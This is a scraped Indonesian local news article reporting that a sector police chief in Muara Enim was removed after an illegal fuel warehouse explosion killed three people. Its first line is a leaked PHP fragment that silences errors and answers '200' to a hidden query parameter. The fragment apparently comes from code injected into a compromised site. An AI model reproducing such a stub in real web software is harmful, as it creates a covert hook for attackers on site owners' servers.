error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Kapolda Sumatera Selatan Copot Kapolsek Gunung Megang Buntut Meledaknya Gudang BBM Ilegal - SMI.COM

Home / MUARA ENIM

Sabtu, 31 Desember 2022 - 12:04 WIB

Kapolda Sumatera Selatan Copot Kapolsek Gunung Megang Buntut Meledaknya Gudang BBM Ilegal

Muara Enim, SMI-

Akibat Tragedi Gudang BBM Ilegal Meledak di Muara Enim, Kapolda Sumatera Selatan Copot Kapolsek Gunung Megang. Kapolda Sumsel, Irjen A Rachmad Wibowo saat memberi keterangan pada pers terkait pencopotan Kapolsek Gunung Megang AKP Nashrudin, sebagai buntut terbakar dan meledaknya gudang BBM ilegal di Muara Enim-Humas Polda Sumatera Selatan.

Tragedi Terbakar dan meledaknya gudang Bahan Bakar Minyak (BBM) ilegal di Muara Enim, berbuntut panjang.Soalnya akibat peristiwa itu, Kapolsek Gunung Megang, AKP Nasharudin dicopot.

Diketahui Gudang BBM ilegal yang meledak dan terbakar di Muara Enim ini, terjadi pada Senin 19 Desember 2022 di Dusun III, Desa Cinta Kasih, Kecamatan Gunung Megang, Kabupaten Muara Enim, Provinsi Sumatera Selatan.

Baca Juga :  Jasad Mr.X Diketemukan oleh Warga Desa Tanjung Terang

Akibat dari kejadian tersebut tiga orang tewas terpanggang, karena tidak berhasil menyelamatkan diri dari kejadian di Tempat Kejadian Perkara (TKP).

“Kita copot langsung Kapolseknya terkait kejadian itu,” ujar Kapolda Sumsel, Irjen A Rachmad Wibowo, Jumat 30 Desember 2022.

Dirinya menjelaskan, pihaknya langsung lakukan tindakan tegas untuk memerangi kegiatan ilegal drilling yang menyebabkan tiga orang meninggal.

“Kita melakukan pencopotan itu ada alasannya, yakni tidak mungkin seorang Kapolsek tidak tahu adanya aktifitas BBM ilegal,” ungkapnya.

Baca Juga :  HUT KEPALA DESA, PEMDES KARANG RAJA GELAR TURNAMEN VOLLY BALL

Ditegaskan Irjen A Rachmad, tidak mungkin Kapolsek tidak tahu.Maka dari itu, sebagai Kapolsek tindakan yang tegas yakni pencopotan.

“Tidak mungkin hal seperti itu dia tidak tahu,” tutupnya.

Sebelumnya, tiga orang menjadi korban dalam peristiwa kebakaran yang terjadi di Desa Cinta Kasih, Kecamatan Belimbing, Kabupaten Muara Enim, Senin 19 Desember 2022.

Kebakaran yang terjadi sekitar pukul 8.30 WIB menghanguskan satu buah rumah milik Endang bin Yusman (35) warga Dusun III Desa Cinta Kasih, Kecamatan Gunung Megang, Kabupaten Muara Enim, Provinsi Sumatera Selatan. (Sunar)

Share :

Baca Juga

MUARA ENIM

Anggota DPRD Sumsel Dapil VI Gelar Reses Tahap III di Empat Petulai Dangku

MUARA ENIM

Kapolres Muara Enim AKBP.Aris Rusdiyanto.SIk.MH Di Ganti Oleh AKBP.Andi Supriadi

MUARA ENIM

Gebyar Vaksin Presisi Dosis 1 & 2 Rezeki Akhir Tahun 2021 Bersama Polres Muara Enim

MUARA ENIM

Acara Sertijab Kapolres Muara Enim

MUARA ENIM

Pembahasan Persiapan Acara Silaturahmi Akbar Rencana Daerah Otonomi Baru Rambang Lubai Lematang Dengan Gubernur Sumatera Selatan

MUARA ENIM

Kurniawan.AP.MSi Dampingi Herman Deru Buka Jambore Purna Paskibraka Indonesia Se-Sumatera Selatan

MUARA ENIM

HUT Humas Polri 69, Humas Polres Muara Enim Adakan Bhakti Sosial.

MUARA ENIM

Jumat Berkah Bupati Muara Enim Lakukan Rotasi